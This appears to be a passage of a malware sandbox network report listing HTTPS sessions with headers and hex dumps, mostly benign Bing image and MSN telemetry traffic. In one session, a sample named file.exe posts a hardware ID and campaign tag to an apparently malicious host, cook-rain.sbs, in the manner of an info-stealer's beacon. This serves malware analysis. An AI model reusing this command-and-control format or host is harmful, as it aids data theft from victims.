                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: f6 5a 9d ec 63 65 f2 2c 7f 75 77 2f fc 05 bf c2 b4 61 8f fd 2b cb 68 f6 fc 9b ab 22 49 ed a2 be f2 d6 ee 39 5b 7e e4 74 fe 35 db 91 b5 ba 1f f3 de a9 6a 5e 2d b6 83 5c b1 ba 9b cc 5d 36 5d ca f7 7f 2b 2a 36 ec 21 35 9a cc b5 b5 f5 2f d8 79 1a 5a a6 b9 67 61 6b 0e a0 d7 7b ac e5 9a 15 fb 9b 59 19 db 66 1b 3e fe dc 53 1b 54 df 63 70 cb f2 ad ab b3 3b be ef bc 1b ee ff 00 df 35 e7 3a 96 8d 2d ae ab a8 6a d3 5d fd b3 47 b5 d5 17 ed 70 c2 ff 00 ba 86 37 6f 95 e4 7e 3e 50 dc 65 41 da d8 f5 ae c7 4f f1 0d 8f cf e4 db c8 b0 de 6e 57 f3 a7 56 de db 89 57 f9 47 dd db fa 56 75 73 3a 9a 2e 81 1a 31 2f c9 ac 45 a8 f8 82 df c9 93 75 be c5 6d 89 fc 6d b8 ff 00 fa ff 00 e0 35 47 c6 17 1a ae 8d ae 4d 36 8b 27 d9 ed 75 24 f3 ee f6 41 b7 f7 9d 17 f7 9c ff 00 86 3e b4 6b 12
                                                                                                                                                                                                            Data Ascii: Zce,uw/a+h"I9[~t5j^-\]6]+*6!5/yZgak{Yf>STcp;5:-j]Gp7o~>PeAOnWVWGVus:.1/Eumm5GM6'u$A>k
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16067INData Raw: 41 21 23 cc 59 83 f5 e1 54 06 c9 ae ba 39 d3 8d 29 ca b4 39 db 8b bb db 47 ab df 6d f6 fc 88 9e 52 ef 05 19 72 a5 25 6f 55 6b 2f c3 fe 1c 5d 78 c8 9e 22 58 fe cb 1c ad bd a7 de 8e df b9 9b 6e e2 41 eb ed f7 bd e8 d1 4c 4d aa a2 ea 57 72 5d 48 d3 46 c8 f7 69 bb c9 c3 70 db fa ae de c3 6e 3d e9 3c 49 a4 6a 7a 5e a5 0c 7a f4 71 d8 4c af b9 fc 97 93 e4 64 67 f9 9d 59 b3 f4 28 4e 7d 6a e5 bf f6 9e 8d 7c aa b6 89 7e d1 24 93 ba 5d c7 34 f0 3c 6f f7 2e 03 01 db ef 61 b7 86 ef 5e ce 03 3b c0 62 f0 1e ce 3f 12 8e cf aa 49 6a ad ba fe 99 11 c1 e2 b0 d8 c4 e7 2b c2 4d df b6 b7 fc 4d 4d 26 3b 9d 26 c7 56 d1 66 b0 d3 75 6b 3b 89 bf d2 3c 9b e5 dd 0c 88 cf 89 51 b3 bd 18 ff 00 2a ab ab e9 3a 62 df a3 5a df 41 67 6f 70 8b 24 36 f7 2f 24 ac ff 00 bb de ea ae a3 e7 0a dc
                                                                                                                                                                                                            Data Ascii: A!#YT9)9GmRr%oUk/]x"XnALMWr]HFipn=<Ijz^zqLdgY(N}j|~$]4<o.a^;b?Ij+MMM&;&Vfuk;<Q*:bZAgop$6/$
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: ee d6 4f 89 b5 59 e7 f0 fd f5 be 83 7f ff 00 13 06 85 96 de 64 fb a8 df ef 30 23 f4 6a ce 5c 91 57 65 43 9e 4e cb 53 e6 5f 8e 1e 04 f1 7e 8d 07 89 35 2d 07 ec 31 69 f7 53 5c 6c b6 48 21 ba 9f ed 12 28 69 86 cd a7 63 2a ee 3b 8f 2a 3e b5 e4 b6 76 0d a3 78 72 dd 56 ef 4d f3 99 3f da 66 7c af 3f 2f f0 7d 7b d7 ae fc 7a f1 a6 b5 a5 c7 35 8d ac 7f d8 d6 73 eb 9b ae de c6 06 59 ef 6e 3c b1 e7 4e d2 e4 7c bb 97 8e 17 95 f4 af 1a d5 23 fb 54 e9 b7 56 fb 55 ad c4 b2 5c dc 3d c7 cb fb b0 b8 ce ff 00 ef 96 fd 6b e6 2a d4 84 a5 ee 3d 2e 7a 13 52 5a 49 6b 63 9b f2 60 d3 75 19 a4 f3 37 6d 85 65 44 fb cb b8 fd ee dc d7 41 f0 e7 5f fb 05 f2 43 71 24 9f 3c de 55 bf 9d b7 ca 48 4a 9f 94 f7 fb dd eb 95 d2 6e 60 8b ed 16 ba 94 72 4b 22 a6 db 44 7d df 22 f9 9f 36 ee 9b be 5a
                                                                                                                                                                                                            Data Ascii: OYd0#j\WeCNS_~5-1iS\lH!(ic*;*>vxrVM?f|?/}{z5sYn<N|#TVU\=k*=.zRZIkc`u7meDA_Cq$<UHJn`rK"D}"6Z
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 4f 33 4d 16 e5 cd 43 40 b3 7d 37 6c 7f 6a 5d a9 b5 de 6f 9b 64 83 ef 6d 38 1f 2d 73 37 5a 7b 59 6c fb 47 ca df c6 8f 5a 5a d6 b1 aa cb 75 b6 ea ef e5 57 6f b8 ff 00 2b e7 da b0 6f 9d a5 9d e6 69 24 66 6f bf be bb 69 f3 2d c9 24 f2 2d 9e 44 fd e6 d6 ad 2f 0d bc 56 ba 8c 3b 6e 36 cd bf 72 4d bd 97 66 2b 09 9d 97 66 da d3 f0 ed a4 f3 df 24 de 5f ee e2 f9 9e b5 92 ba 26 5b 1a fa c5 bc af 3c df 6a 92 49 6e 1a 66 67 7d fb b7 e7 9f bd fc 59 ac 1b cb 29 6d 6e bc b9 23 92 26 fb d5 b3 34 eb 3c ee cd bd 57 7f c9 fd e4 a8 e6 3e 6e b9 0a c3 77 e6 af d9 fe fc c8 ab f8 71 53 1d 11 25 3d 27 cf fd f4 d7 5f 77 67 df 7a 8f 52 9d ae 23 85 be cf 02 ed f9 7e 44 fb ff 00 5a b7 e2 49 d6 de 4b 7b 58 7e 56 d9 fe 91 b1 fe 57 63 55 2e 24 ff 00 45 f2 7f ba fb 92 ae f7 03 5b 43 bf 9f
                                                                                                                                                                                                            Data Ascii: O3MC@}7lj]odm8-s7Z{YlGZZuWo+oi$foi-$-D/V;n6rMf+f$_&[<jInfg}Y)mn#&4<W>nwqS%='_wgzR#~DZIK{X~VWcU.$E[C


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.649731150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC346OUTGET /th?id=OADD2.10239402415510_1LQQ8WSBAXW97X0WT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 606841
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 48651D78DF4D45FE89955D37A6E0D540 Ref B: EWR30EDGE0118 Ref C: 2024-11-21T14:17:18Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 16 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 39 3a 31 32 20 30 39 3a 34 36 3a 30 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF``ZExifMM*bj(1 r2i``Adobe Photoshop 25.11 (Windows)2024:09:12 09:46:028
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: e8 6b 4d 16 a1 8b 6c 9b 5a ae 47 b5 7f e5 9d 53 8c b3 47 f3 7d ea d1 b5 46 78 d3 75 71 d4 67 b7 85 82 7a 45 12 c6 19 bf e5 9d 48 a3 f8 6a 48 63 dd b2 ac 2c 0a df 76 b9 1c 91 ee d3 a3 72 15 45 69 37 55 a8 63 66 a9 21 b4 ab 51 c0 cb 1e ea e7 9d 43 d3 a3 87 7d 51 5e 3b 7a 95 61 db 53 ad bb 35 48 b6 cc 6b 17 50 ee 8e 1f 4d 11 5d 53 6d 0a 1a ae 47 06 ef bd 52 47 6e bf f0 2a cd cd 1b c6 83 65 35 0d 53 2f fb 55 71 6d d5 be ed 3b ec eb 51 ed 11 d1 1a 0d 11 c3 1d 4e b1 2f 99 f3 52 ac 6a b5 2a 8d bf 7a b2 94 ae 75 53 a6 b6 62 ac 4b 52 c3 1a ad 44 c5 bc bf 96 8c ca b5 9b 3a 54 51 6f 62 d1 84 a8 3c d6 6a 99 77 37 de a8 3a 23 66 84 c5 3b ef 52 aa 50 c2 95 cb b0 aa 31 4b 42 a3 53 d5 2a 1b 34 5b 02 d3 96 91 85 3a 31 ba a1 bb 96 90 67 15 22 bd 37 65 2c 62 91 a2 d0 b2 a7
                                                                                                                                                                                                            Data Ascii: kMlZGSG}FxuqgzEHjHc,vrEi7Ucf!QC}Q^;zaS5HkPM]SmGRGn*e5S/Uqm;QN/Rj*zuSbKRD:TQob<jw7:#f;RP1KBS*4[:1g"7e,b
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 5c 7e ef e6 ae 77 5c ff 00 59 f2 ff 00 e3 95 ea 61 6f 75 73 e3 b3 a7 07 06 d1 93 30 65 f9 7f 86 a1 61 56 64 a8 b9 af 50 f8 f4 40 c1 aa 36 18 a9 da 93 15 46 9c c5 7c d1 9a 99 a2 55 a6 32 62 82 b9 93 1b 4c 6a 73 52 71 41 43 72 68 a7 6d f7 a6 e0 d0 30 a5 5a 4a 29 dc 43 a9 33 42 d1 8a 40 3d 4d 2e 6a 3c d3 e8 13 1d bb de 85 34 da 76 df 6a 04 3a 9d 4c 5a 91 68 21 89 d6 8a 28 a9 10 51 4e fb d4 6d f6 a0 1b 1b 4e db ed 4b 8a 31 40 ae 26 df 6a 6d 4b b2 8d 94 05 c8 a8 e6 a7 58 dd a3 dd fd da 6f 96 df c3 40 ee 47 8a 5d be d4 ff 00 29 fd 6a 55 89 9b ee d2 ba 0b 37 b2 2b ed f6 a9 6d ed e4 7f b9 1e ea bf 63 64 cd 22 b4 91 d6 9d ad b2 c1 f2 af de ac 2a 62 23 1d b7 3d 1c 3e 5f 52 a5 9c b4 46 0f d9 a4 f3 36 d4 d1 d9 4b e5 fc d5 bb e4 2f de d9 4e 58 bf ef 9a c5 e2 59 db 0c
                                                                                                                                                                                                            Data Ascii: \~w\Yaous0eaVdP@6F|U2bLjsRqACrhm0ZJ)C3B@=M.j<4vj:LZh!(QNmNK1@&jmKXo@G])jU7+mcd"*b#=>_RF6K/NXY
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: a7 c5 35 a8 27 94 65 36 9c c2 9a c2 82 42 8e 69 19 55 be f5 2f 34 00 51 45 2e 69 a0 16 8a 6d 26 69 80 fa 36 fb 53 37 d1 be 80 1f 4b 8a 6e 69 54 d4 80 ee 94 ea 66 68 cd 03 4e c4 bb bd e9 ac 6a 3d de f4 31 a0 7c c8 7e 69 54 d4 7b 9a 95 68 1a 77 26 cd 3b 35 0e 69 d9 a0 ab 8e cd 2b 3d 33 34 9c d2 b0 f9 87 e6 8c d3 14 d1 45 87 70 99 3c d8 fc b5 92 45 6f ef a3 ed ac 5f 0f f8 a7 4c d5 35 27 d3 63 9f 75 c2 bb 2a 3f f0 cc c3 3b 87 d7 e5 ad a8 7f d7 a2 b7 f7 eb e6 fb ad 67 c7 ba 4f c6 9f 32 4d 26 fb fb 0e eb 56 6b 3b 1b 4f b5 7e e1 e6 49 37 e4 c8 4f ca bb 57 9c 2e 0f 20 53 8c 6e 65 39 b8 ea 8f a4 33 ba 93 35 4b 43 b8 9e eb 4d 49 ae 20 f2 a4 df b7 e4 7d cb ff 00 01 ab 95 26 8a 57 57 06 34 51 45 03 b8 99 a4 a9 39 a4 c5 03 19 bb de 8d de f4 fc 52 30 a0 06 d1 4e a2 81
                                                                                                                                                                                                            Data Ascii: 5'e6BiU/4QE.im&i6S7KniTfhNj=1|~iT{hw&;5i+=34Ep<Eo_L5'cu*?;gO2M&Vk;O~I7OW. Sne935KCMI }&WW4QE9R0N
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 1b 73 1f c2 b1 ae af 7e e7 4d 07 6b 68 7a 5f c1 3d 63 5a 83 c5 5a 34 97 d1 e9 ba 5e a1 e2 6b 7f 22 c6 67 ba 56 9e e5 4e 66 79 1a 2e b1 cb 2b 36 01 5e 8a df 77 a5 7b 6f c6 a8 db 5c f8 11 ae 5c 68 f7 fe 54 91 58 fd b2 19 bf 8a 16 87 f7 8d ff 00 02 1b 2b c3 7e 0e fc 44 d2 ad be 0e e9 9a 2e b4 9a 56 97 ae 78 6a c7 6a 6a 97 df 32 ea 16 53 6f 78 7c a5 4f de b4 9f 2f b1 5f 5a f4 4d 17 e2 a7 87 a6 f8 1f ab 5e 5e 6b ba 6d d4 8b 63 0f d9 ed 1d 16 2f dd ed 4f bf fc 52 26 fd db 88 07 01 30 79 ac e9 b8 28 b8 df 72 ea 46 4e 5c c7 c5 57 da 84 b7 16 a9 ab 5f 5f ea 5f 6e de b2 fd a3 ef 32 65 b7 02 ac 79 66 fb c7 35 d8 5b dd e8 7a bf c2 7d 5b 52 92 d2 fb fb 41 ae 21 8a d3 51 bb 9d b7 26 57 13 3c 8f ff 00 2d 72 df c0 17 2a 39 cf 35 d8 78 a3 e1 da f8 b7 58 f1 34 92 6b 5a 96
                                                                                                                                                                                                            Data Ascii: s~Mkhz_=cZZ4^k"gVNfy.+6^w{o\\hTX+~D.Vxjjj2Sox|O/_ZM^^kmc/OR&0y(rFN\W___n2eyf5[z}[RA!Q&W<-r*95xX4kZ
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 00 5a c2 f8 99 e3 1d 7b c6 5a e5 c6 a1 79 3e eb 58 bc b5 b7 87 fe 59 59 46 8b 1a 2f 94 3f 83 ee 0e 95 d9 fe ce 3a fe 99 3f 8c 6c 6f 35 4f b0 c5 67 a6 dc 34 ff 00 68 d8 bb 52 f5 d4 ed 9d c3 e4 3a 22 ae d0 3b 3b e7 15 9d 47 b3 2a 25 8f 04 d8 6b da 36 87 ab 6b 4b e1 3b 58 ac 74 6b 7b 48 35 48 66 dd 3b 79 85 9e 48 fc fd 9c 29 63 b7 70 6f ba 76 66 ad fe cf 37 fa aa 7c 7e f0 f7 97 ab 5f 4b 0d 9e a9 77 63 7d 69 6f 62 db 6d a3 9a 43 23 db a3 7f 1a be 33 b7 ad 74 6d f1 27 57 4f 18 f8 d3 c2 be 15 92 0b ad 3f c5 5a b3 4f 7d fd a9 a7 2f 9a f1 fd 95 17 cd 6f e1 5f bb bb f5 ac 1f 82 3e 34 f1 8d 94 76 3a 7e 8f a9 58 c5 f6 af 12 5c cf 2c d6 f6 b1 b4 b7 2a 8a 9b a5 97 78 fb a3 cb 5d 9f 8d 73 4e 71 85 da d8 b5 76 7b 17 8c 3e 20 ea fa cd c6 93 e0 f8 52 ee de de ce e2 75 9b
                                                                                                                                                                                                            Data Ascii: Z{Zy>XYYF/?:?lo5Og4hR:";;G*%k6kK;Xtk{H5Hf;yH)cpovf7|~_Kwc}iobmC#3tm'WO?ZO}/o_>4v:~X\,*x]sNqv{> Ru
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: a3 65 47 f3 6e 23 93 6e df ef d6 a5 bf 8a 96 29 fc c8 e3 85 3f 85 11 e0 5d bf 9a 9c d2 b7 8a 9c 24 3f e8 96 bf 2f df f9 3e ff 00 f9 ed 51 cd 3e 91 36 f6 54 15 af 53 f0 ff 00 82 43 f6 b8 1f ef 79 6b ff 00 6f 52 7d df ce 92 49 60 3b 1a 3f 2f e6 f9 7f d7 49 57 1b c4 b6 6f 32 37 d8 7c a5 fe 3d 90 46 db ff 00 95 36 3f 10 d9 b4 08 d2 69 b1 f9 8b bb 63 a2 2a ab fe 1d b1 52 b9 bf 94 d6 51 a5 ff 00 3f 57 fe 02 55 86 ef 64 ff 00 bb 82 05 db bb e7 47 6f 9f fe fa a5 86 fe fb c8 da b2 6d 8d bf d8 5d bb aa c2 eb b6 9f 77 ec 91 f9 7b 3e 7f e1 f9 8f f7 46 29 bf db 16 d6 f2 3f 93 06 e6 97 6f df 7d bd 3f e0 34 3d 7e c8 a2 e0 ad 6a bf 71 03 45 7c ff 00 2a cf 6b 13 36 ef 9f e5 fb bf 85 44 b2 df 27 ef 16 48 db 6a 7c 8e 90 7c cf b7 b8 3f d6 b4 57 c4 1a 52 4e eb 35 a7 cc ce bf
                                                                                                                                                                                                            Data Ascii: eGn#n)?]$?/>Q>6TSCykoR}I`;?/IWo27|=F6?ic*RQ?WUdGom]w{>F)?o}?4=~jqE|*k6D'Hj||?WRN5
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC16067INData Raw: 71 df bd 7b 07 c1 5f 8c 9a 56 9b e2 4b bb 1f 11 5f c9 2c 3a 6d a6 dd 3a e2 64 66 9e f5 52 47 e2 65 fe f8 46 e3 a6 76 57 98 6a d3 e8 7f 65 b7 f1 15 9f 97 6b 33 3d c7 da ed 1d db 6d cf ef 36 c7 73 1a b6 4a af 77 4c e7 db 15 dd 91 e1 31 78 69 62 68 d7 5a 4a d6 6b 6d 53 db f5 32 c6 d7 a1 51 53 94 5e ab fe 01 b1 e2 cb 2d 43 c5 1e 3f 87 50 f1 25 df f6 6d 8c 4e b1 69 cf e5 aa fd 8a cb cc db bf f8 46 e3 f3 13 8c fc cd 59 1f 13 a2 d1 5e c5 34 bf 04 c7 f6 cd 2f 4d db b3 51 86 e9 9a ea 65 2c 73 e6 c2 de fd 36 83 f5 aa 7a 09 d3 f5 cd 72 e2 df 56 bb be bc 6b 79 bf e2 5c 9b 19 95 e3 76 3b d9 73 c2 ae ee df 2d 64 78 92 4d 3d f5 27 8f 4d 82 d6 c2 3b 7d cd 6e 93 7e e2 57 5f 69 07 0d 9e d9 f9 ab e9 70 b4 7d 9b 8c 3f 95 2e 9a 1e 6d 49 de ef bf de 47 e1 34 8a d6 ea e2 e2 49
                                                                                                                                                                                                            Data Ascii: q{_VK_,:m:dfRGeFvWjek3=m6sJwL1xibhZJkmS2QS^-C?P%mNiFY^4/MQe,s6zrVky\v;s-dxM='M;}n~W_ip}?.mIG4I
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC16384INData Raw: f5 c4 47 ff 00 89 75 cd be ed c8 fb 8f ee f7 12 fe 50 2b fd ce 3e f5 79 56 9f e1 1b e5 81 b5 29 36 7d 8d 6f 9a d2 54 49 ff 00 e3 da 41 f3 04 73 db 2a 3d f7 6d af 5b 0f 89 a3 52 4e 53 4b 99 5b d7 fa 76 2f 96 4a 2a 29 e8 c9 fe 14 e8 9f 68 d5 61 bc bc f9 59 9e 35 85 11 f6 b2 65 bf 2e 76 e3 fe 05 49 e2 24 8b 49 92 fa 49 2e 3e d0 d1 4d f6 6b 77 74 65 64 cb 6f c7 f7 46 3f 2a df d5 ad 22 f0 f6 8f 69 67 25 dc 9f 6c bf 86 6d ef bf 72 db 30 6c ec 21 b9 e7 80 4d 70 7a c4 ec b1 c3 ba 49 25 87 63 37 ce 9f 7f de bb 69 5e a4 9c d3 d1 9a 4e d0 82 8f 51 2d 4a db fc b7 11 c9 b9 be ff 00 f7 aa e7 85 fe d3 16 b1 6f 37 ee d9 ad 66 56 d8 ff 00 34 4f eb b8 7f 76 a9 68 62 0b 8b e4 6b a9 24 58 7e 6d ef bf ee 7c bc 6d fa 56 97 83 6e 16 0f 1a 58 ea 0d 77 6b 6b e5 4c b2 bb dc 23 4b
                                                                                                                                                                                                            Data Ascii: GuP+>yV)6}oTIAs*=m[RNSK[v/J*)haY5e.vI$II.>MkwtedoF?*"ig%lmr0l!MpzI%c7i^NQ-Jo7fV4Ovhbk$X~m|mVnXwkkL#K
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC16384INData Raw: 2d 5e e2 d7 c5 1a c4 ab 14 cc af 32 5a c7 b5 d4 77 55 eb b7 fd a1 5a 1f f0 cb ff 00 0e ec 3f 7d 7d ab 78 8d 21 fd cf fa e8 3f bf fe ea 1d ab ee 6b 2f ed 1a 36 be bf 71 b7 f6 7d 6b db 4f bc f8 f5 85 cb ff 00 b3 b7 fe f9 a9 14 5e 7f cf 4d b5 f6 0e a9 f0 43 e0 7e 9d 71 bb 56 d6 af a2 86 df 72 cd bf 54 55 95 d5 3f 8b 6e d0 7f 01 5e 5d f1 62 df e0 7e 97 e1 ff 00 b2 f8 7f 4d ba fb 45 e4 2a d1 5d da 6b 0b 7d e4 b0 6f e2 5e 36 e5 7a 8f ca 9c 31 d0 a8 ed 14 c5 3c 0c e0 9b 94 91 e5 5a 0c 6d 3e 95 70 d7 11 ee fb 3c 32 32 7c fb 7f 86 b2 34 f8 da 3f de 37 cd 5b da 85 bb 2d 8c d3 69 3a 4d f2 d9 aa 2f 9d 36 c6 65 dc 57 9f 98 8f 97 f1 ac 95 2a d0 24 71 ff 00 c0 eb a1 6b a9 c6 d5 8b 5f 66 65 81 2f ae 3e 58 d9 f6 c2 8f fc 75 7d a2 8a d2 08 a1 8e 38 25 ba 97 e6 79 be 6f 93
                                                                                                                                                                                                            Data Ascii: -^2ZwUZ?}}x!?k/6q}kO^MC~qVrTU?n^]b~ME*]k}o^6z1<Zm>p<22|4?7[-i:M/6eW*$qk_fe/>Xu}8%yo


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            21192.168.2.64972920.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC265OUTPOST /v3/Delivery/Events/Impression HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Content-Length: 1513
                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC1513OUTData Raw: 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 54 49 44 3d 31 26 43 49 44 3d 31 32 38 30 30 30 30 30 30 30 30 31 36 31 35 36 30 39 26 42 49 44 3d 31 38 36 38 33 31 31 36 38 37 26 50 47 3d 50 43 30 30 30 50 30 46 52 35 2e 30 30 30 30 30 30 30 49 52 55 26 54 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 52 45 51 41 53 49 44 3d 46 34 30 44 37 31 46 44 32 44 32 46 34 31 42 43 41 37 43 35 43 34 44 32 36 45 39 31 42 35 30 37 26 41 53 49 44 3d 62 34 38 35 34 61 34 36 37 30 39 36 34 61 33 30 38 36 37 65 62 63 37 36 34 34 65 35 37 31 32 31 26 54 49 4d 45 3d 32 30 32 34 31 31 32 31 54 31 34 31 37 31 30 5a 26 53 4c 4f 54 3d 31 26 52 45 51 54 3d 32 30 32 34 31 31 32 31 54 31 34 31 37 30 35 26 4d 41 5f 53 63 6f 72 65 3d 30 26 26 44 53 5f 45 56 54 49 44 3d 46 34 30 44 37 31 46
                                                                                                                                                                                                            Data Ascii: PID=426081542&TID=1&CID=128000000001615609&BID=1868311687&PG=PC000P0FR5.0000000IRU&TPID=426081542&REQASID=F40D71FD2D2F41BCA7C5C4D26E91B507&ASID=b4854a4670964a30867ebc7644e57121&TIME=20241121T141710Z&SLOT=1&REQT=20241121T141705&MA_Score=0&&DS_EVTID=F40D71F
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC394INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                            Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: []
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            22192.168.2.649732188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LA3ZLGO3MHCG
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 15075
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC15075OUTData Raw: 2d 2d 4c 41 33 5a 4c 47 4f 33 4d 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 4c 41 33 5a 4c 47 4f 33 4d 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 41 33 5a 4c 47 4f 33 4d 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4c 41 33 5a 4c 47 4f 33
                                                                                                                                                                                                            Data Ascii: --LA3ZLGO3MHCGContent-Disposition: form-data; name="hwid"12542E73492FE2AC4AFF5ADEC9E6BD77--LA3ZLGO3MHCGContent-Disposition: form-data; name="pid"2--LA3ZLGO3MHCGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--LA3ZLGO3
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:18 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=9bf7farqte700lfgetmp80kie6; expires=Mon, 17-Mar-2025 08:03:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
